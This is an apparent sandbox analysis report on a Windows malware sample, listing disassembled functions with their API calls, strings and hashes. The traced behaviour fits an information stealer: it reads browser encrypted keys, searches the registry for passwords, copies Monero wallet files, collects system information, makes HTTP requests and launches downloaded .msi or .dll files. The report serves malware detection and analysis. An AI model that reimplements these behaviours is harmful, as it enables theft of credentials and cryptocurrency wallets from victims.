                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateGlobalStream
                                        • String ID: image/jpeg
                                        • API String ID: 2244384528-3785015651
                                        • Opcode ID: 92af2171195ea5de5c83846ea80e952cf4b1f307dc563a205a8e77a97a469ece
                                        • Instruction ID: fe04fbb3aa90d691426fe8f050af0181c6e158ddf780e2355af02b26e86747f1
                                        • Opcode Fuzzy Hash: 92af2171195ea5de5c83846ea80e952cf4b1f307dc563a205a8e77a97a469ece
                                        • Instruction Fuzzy Hash: FF7110B5A10208EBDB04DFE4DD89FEEB7B8BF48301F108509F615AB294DB34A945CB65
                                        Function 00A52E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00A531C5
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00A5335D
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00A534EA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExecuteShell$lstrcpy
                                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                        • API String ID: 2507796910-3625054190
                                        • Opcode ID: 82451001e19b316d8a0a1ffcd1a5a6cff1e404c0ad5d8ddeeff830a687bf2c39
                                        • Instruction ID: a233998955c2cd42edd5f84515c2b7db6e4a588932ef16ef0ae6d1a07dbcc885
                                        • Opcode Fuzzy Hash: 82451001e19b316d8a0a1ffcd1a5a6cff1e404c0ad5d8ddeeff830a687bf2c39
                                        • Instruction Fuzzy Hash: 54120071A001189ADB05EBA0DE92FDEB778BF24301F504659F90676191EF742B4ECFA2
                                        Function 00A552C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00A5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A5A7E6
                                          • Part of subcall function 00A46280: InternetOpenA.WININET(00A60DFE,00000001,00000000,00000000,00000000), ref: 00A462E1
                                          • Part of subcall function 00A46280: StrCmpCA.SHLWAPI(?,0160E9B0), ref: 00A46303
                                          • Part of subcall function 00A46280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A46335
                                          • Part of subcall function 00A46280: HttpOpenRequestA.WININET(00000000,GET,?,0160E578,00000000,00000000,00400100,00000000), ref: 00A46385
                                          • Part of subcall function 00A46280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00A463BF
                                          • Part of subcall function 00A46280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A463D1
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A55318
                                        • lstrlen.KERNEL32(00000000), ref: 00A5532F
                                          • Part of subcall function 00A58E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A58E52
                                        • StrStrA.SHLWAPI(00000000,00000000), ref: 00A55364
                                        • lstrlen.KERNEL32(00000000), ref: 00A55383
                                        • lstrlen.KERNEL32(00000000), ref: 00A553AE
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                        • API String ID: 3240024479-1526165396
                                        • Opcode ID: 2776578e54a7f4093624e8adc5831b2e0f75dbe00cb9307b9ed1dd3fba4ad65e
                                        • Instruction ID: 555bf1c331a810e3566a072fae3123771a87fd90e5c1df3caac9d12dc7a89808
                                        • Opcode Fuzzy Hash: 2776578e54a7f4093624e8adc5831b2e0f75dbe00cb9307b9ed1dd3fba4ad65e
                                        • Instruction Fuzzy Hash: 3F511F30A10148ABDB14FF70CE96AED7779BF60302F504118FD069A592EF346B4ACB62
                                        Function 00A512D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpylstrlen
                                        • String ID:
                                        • API String ID: 2001356338-0
                                        • Opcode ID: 76710e9f736bc5011808557b025540f0b4bbc58448c1a294f964b5c12655d9cf
                                        • Instruction ID: 4a3847bb8828337c0e3c74f44af0dff598c85a11b498e82865abeb16902329ca
                                        • Opcode Fuzzy Hash: 76710e9f736bc5011808557b025540f0b4bbc58448c1a294f964b5c12655d9cf
                                        • Instruction Fuzzy Hash: C8C1B6B5A002099BCB14EF60DD89FEE7778BF64305F004599F90AA7141EB74AA89CF91
                                        Function 00A54280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00A58DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A58E0B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A542EC
                                        • lstrcat.KERNEL32(?,0160E218), ref: 00A5430B
                                        • lstrcat.KERNEL32(?,?), ref: 00A5431F
                                        • lstrcat.KERNEL32(?,0160D5A8), ref: 00A54333
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A58D90: GetFileAttributesA.KERNEL32(00000000,?,00A41B54,?,?,00A6564C,?,?,00A60E1F), ref: 00A58D9F
                                          • Part of subcall function 00A49CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00A49D39
                                          • Part of subcall function 00A499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A499EC
                                          • Part of subcall function 00A499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A49A11
                                          • Part of subcall function 00A499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00A49A31
                                          • Part of subcall function 00A499C0: ReadFile.KERNEL32(000000FF,?,00000000,00A4148F,00000000), ref: 00A49A5A
                                          • Part of subcall function 00A499C0: LocalFree.KERNEL32(00A4148F), ref: 00A49A90
                                          • Part of subcall function 00A499C0: CloseHandle.KERNEL32(000000FF), ref: 00A49A9A
                                          • Part of subcall function 00A593C0: GlobalAlloc.KERNEL32(00000000,00A543DD,00A543DD), ref: 00A593D3
                                        • StrStrA.SHLWAPI(?,0160E1D0), ref: 00A543F3
                                        • GlobalFree.KERNEL32(?), ref: 00A54512
                                          • Part of subcall function 00A49AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A44EEE,00000000,00000000), ref: 00A49AEF
                                          • Part of subcall function 00A49AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00A44EEE,00000000,?), ref: 00A49B01
                                          • Part of subcall function 00A49AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A44EEE,00000000,00000000), ref: 00A49B2A
                                          • Part of subcall function 00A49AC0: LocalFree.KERNEL32(?,?,?,?,00A44EEE,00000000,?), ref: 00A49B3F
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A544A3
                                        • StrCmpCA.SHLWAPI(?,00A608D1), ref: 00A544C0
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00A544D2
                                        • lstrcat.KERNEL32(00000000,?), ref: 00A544E5
                                        • lstrcat.KERNEL32(00000000,00A60FB8), ref: 00A544F4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                        • String ID:
                                        • API String ID: 3541710228-0
                                        • Opcode ID: f109908e0082befe1fcf667978f777a690348c39025fc15b0a7a2c54d219fa1c
                                        • Instruction ID: 6f3ade72b017985ce4f2e3f1836f4dd86f9e4add1757a9c300cc88bb0185f507
                                        • Opcode Fuzzy Hash: f109908e0082befe1fcf667978f777a690348c39025fc15b0a7a2c54d219fa1c
                                        • Instruction Fuzzy Hash: 1B7158B6900208BBDB14EBB0DD85FEE7779BB88301F044599F605A7181EA34DB59CFA1
                                        Function 00A41310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00A412A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A412B4
                                          • Part of subcall function 00A412A0: RtlAllocateHeap.NTDLL(00000000), ref: 00A412BB
                                          • Part of subcall function 00A412A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00A412D7
                                          • Part of subcall function 00A412A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00A412F5
                                          • Part of subcall function 00A412A0: RegCloseKey.ADVAPI32(?), ref: 00A412FF
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A4134F
                                        • lstrlen.KERNEL32(?), ref: 00A4135C
                                        • lstrcat.KERNEL32(?,.keys), ref: 00A41377
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                          • Part of subcall function 00A58B60: GetSystemTime.KERNEL32(00A60E1A,0160A9C8,00A605AE,?,?,00A413F9,?,0000001A,00A60E1A,00000000,?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A58B86
                                          • Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
                                          • Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00A41465
                                          • Part of subcall function 00A5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A5A7E6
                                          • Part of subcall function 00A499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A499EC
                                          • Part of subcall function 00A499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A49A11
                                          • Part of subcall function 00A499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00A49A31
                                          • Part of subcall function 00A499C0: ReadFile.KERNEL32(000000FF,?,00000000,00A4148F,00000000), ref: 00A49A5A
                                          • Part of subcall function 00A499C0: LocalFree.KERNEL32(00A4148F), ref: 00A49A90
                                          • Part of subcall function 00A499C0: CloseHandle.KERNEL32(000000FF), ref: 00A49A9A
                                        • DeleteFileA.KERNEL32(00000000), ref: 00A414EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                        • API String ID: 3478931302-218353709
                                        • Opcode ID: aaf92ac861f9bdf8b32291fb727a8cd17b149e56d84671dee2cc82e2312faa31
                                        • Instruction ID: d3914d8e978b56fc049ecacd66ea72e954025d674420b1da6cfea8877dea27c0
                                        • Opcode Fuzzy Hash: aaf92ac861f9bdf8b32291fb727a8cd17b149e56d84671dee2cc82e2312faa31
                                        • Instruction Fuzzy Hash: DF5138B1E5011897CB15FB60DD92FED733CBF64701F404698B60A62081EE345B89CBA6
                                        Function 00A475D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00A472D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00A4733A
                                          • Part of subcall function 00A472D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00A473B1
                                          • Part of subcall function 00A472D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00A4740D
                                          • Part of subcall function 00A472D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00A47452
                                          • Part of subcall function 00A472D0: HeapFree.KERNEL32(00000000), ref: 00A47459
                                        • lstrcat.KERNEL32(00000000,00A617FC), ref: 00A47606
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00A47648
                                        • lstrcat.KERNEL32(00000000, : ), ref: 00A4765A
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00A4768F
                                        • lstrcat.KERNEL32(00000000,00A61804), ref: 00A476A0
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00A476D3
                                        • lstrcat.KERNEL32(00000000,00A61808), ref: 00A476ED
                                        • task.LIBCPMTD ref: 00A476FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                        • String ID: :
                                        • API String ID: 2677904052-3653984579
                                        • Opcode ID: f04908d0fc0f9f75ec589746489df026d773b82caa5cac95fe01ec4e3a6b9f27
                                        • Instruction ID: ec6bcf5da316f0944ad9b197ceca3f39e54b5796529e23a5d4b0fea1561400f1
                                        • Opcode Fuzzy Hash: f04908d0fc0f9f75ec589746489df026d773b82caa5cac95fe01ec4e3a6b9f27
                                        • Instruction Fuzzy Hash: 22318E75A00109EFDB04EBB4ED85FFF7779BB84301B144509F102A72A1EB38A946CB65
                                        Function 00A58100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0160E758,00000000,?,00A60E2C,00000000,?,00000000), ref: 00A58130
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A58137
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00A58158
                                        • __aulldiv.LIBCMT ref: 00A58172
                                        • __aulldiv.LIBCMT ref: 00A58180
                                        • wsprintfA.USER32 ref: 00A581AC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                        • String ID: %d MB$@
                                        • API String ID: 2774356765-3474575989
                                        • Opcode ID: c35d052b0b5f94e9fc2229a6f5cd9e5f0f2f0c8bf4fcf6c0ccbcb656f6fa0e79
                                        • Instruction ID: 3aa9a55f62108bf39e06e881f923f74b45188f5b583b794d3b0991fb7453c9af
                                        • Opcode Fuzzy Hash: c35d052b0b5f94e9fc2229a6f5cd9e5f0f2f0c8bf4fcf6c0ccbcb656f6fa0e79
                                        • Instruction Fuzzy Hash: E2214DB1E44208ABEB10DFD4CD49FAFB7B8FB44B41F104609F605BB280D77859058BA9
                                        Function 00A460A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00A5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A5A7E6
                                          • Part of subcall function 00A447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A44839
                                          • Part of subcall function 00A447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00A44849
                                        • InternetOpenA.WININET(00A60DF7,00000001,00000000,00000000,00000000), ref: 00A4610F
                                        • StrCmpCA.SHLWAPI(?,0160E9B0), ref: 00A46147
